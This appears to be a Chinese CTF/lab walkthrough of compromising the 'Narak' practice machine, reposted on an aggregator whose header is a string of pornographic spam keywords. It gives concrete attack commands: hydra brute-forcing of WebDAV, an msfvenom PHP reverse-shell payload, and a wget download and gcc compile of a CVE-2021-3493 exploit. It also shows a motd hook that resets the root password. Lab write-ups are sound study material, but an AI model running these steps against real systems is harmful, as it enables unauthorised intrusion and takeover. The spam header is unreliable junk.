日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

打靶narak

發(fā)布時(shí)間:2024/1/18 编程问答 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 打靶narak 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

打靶narak

    • 主機(jī)發(fā)現(xiàn)
    • 端口掃描
    • dirb基于字典的目錄掃描工具
    • 網(wǎng)絡(luò)存儲(chǔ)文件共享之WebDAV
    • 再嘗試登陸下:
    • cadaver工具連接
    • 上傳shell
    • 用 msfvenom生成木馬
    • 提權(quán) 權(quán)限維持
    • 用ssh嘗試登錄其他用戶,
    • 提權(quán)助手 提權(quán) github 開源項(xiàng)目
    • 挨個(gè)試一試
    • 第一種 : 通過gcc編譯提權(quán)文件,上傳執(zhí)行后,提權(quán)至root獲取:
  • 這種.c文件需要編譯成可執(zhí)行文件 記住
    • 第二種:使用motd提權(quán),

主機(jī)發(fā)現(xiàn)

nmap -sS 192.168.226.0/24

端口掃描

dirb基于字典的目錄掃描工具

發(fā)現(xiàn)三個(gè)目錄


訪問該目錄

網(wǎng)絡(luò)存儲(chǔ)文件共享之WebDAV


再用hydra爆破以下
或者burpsuite爆破
yamdoot, Swarg

.海德拉(Hydra)
Medusa(美杜莎)
patator
msf
都可以

用cewl工具通過爬取網(wǎng)站信息的關(guān)鍵字來生成字典,通過生成的字典進(jìn)行爆破

用hydra爆破工具爆破

-L指定用戶名 -P指定密碼 ip地址加協(xié)議加路徑。http就是網(wǎng)站的協(xié)議,get是采用的請(qǐng)求方法,后面加路徑

再嘗試登陸下:

無可用信息,查看下源代碼:

cadaver工具連接

cadaver http://192.168.8.132/webdav

username:yamdoot

password:Swarg

1.百度發(fā)現(xiàn)webdav服務(wù),需要cadaver工具連接,連接之后可以上傳

上傳shell

nmap -O 發(fā)現(xiàn)其實(shí) linux 系統(tǒng)

用 msfvenom生成木馬

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php


監(jiān)聽

上傳

liunx失敗換一個(gè)php的

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php


msf 監(jiān)聽
訪問php文件

shell拿到

提權(quán) 權(quán)限維持

權(quán)限低

查看用戶:


mnt 目錄 hell.sh

https://www.splitbrain.org/services/ook


brainfuck to text解碼,得到解密內(nèi)容chitragupt 應(yīng)該是密碼
chitragupt

用ssh嘗試登錄其他用戶,

輸入剛剛解密的密碼,發(fā)現(xiàn)成功登錄該用戶

ssh inferno@192.168.226.155


提權(quán)助手 提權(quán) github 開源項(xiàng)目

https://github.com/mzet-/linux-exploit-suggester

linux中的.sh文件怎么執(zhí)行?

1、直接./加上文件名.sh,如運(yùn)行hello.sh為 ./hello.sh 【絕對(duì)路徑下也可以,但hello.sh必須有x權(quán)限】

chmod u+x hello.sh



上傳解壓

挨個(gè)試一試

第一種 : 通過gcc編譯提權(quán)文件,上傳執(zhí)行后,提權(quán)至root獲取:

通過https://github.com/briskets/CVE-2021-3493 下載提權(quán)文件:
使用gcc將提權(quán)文件編譯成可執(zhí)行文件:

這種.c文件需要編譯成可執(zhí)行文件 記住

gcc exploit.c -o exploit

開放本機(jī)的8888端口 提供下載:

通過wget 傳送至靶機(jī)上:

wget http://192.168.226.142:8888/exploit


第二種:使用motd提權(quán),

在文件中最后一行寫入命令,將root密碼替換掉,切換root用戶獲取。

echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header

退出后重新用inferno登錄

su -root

成功獲取root權(quán)限: 密碼 inferno

總結(jié)

以上是生活随笔為你收集整理的打靶narak的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。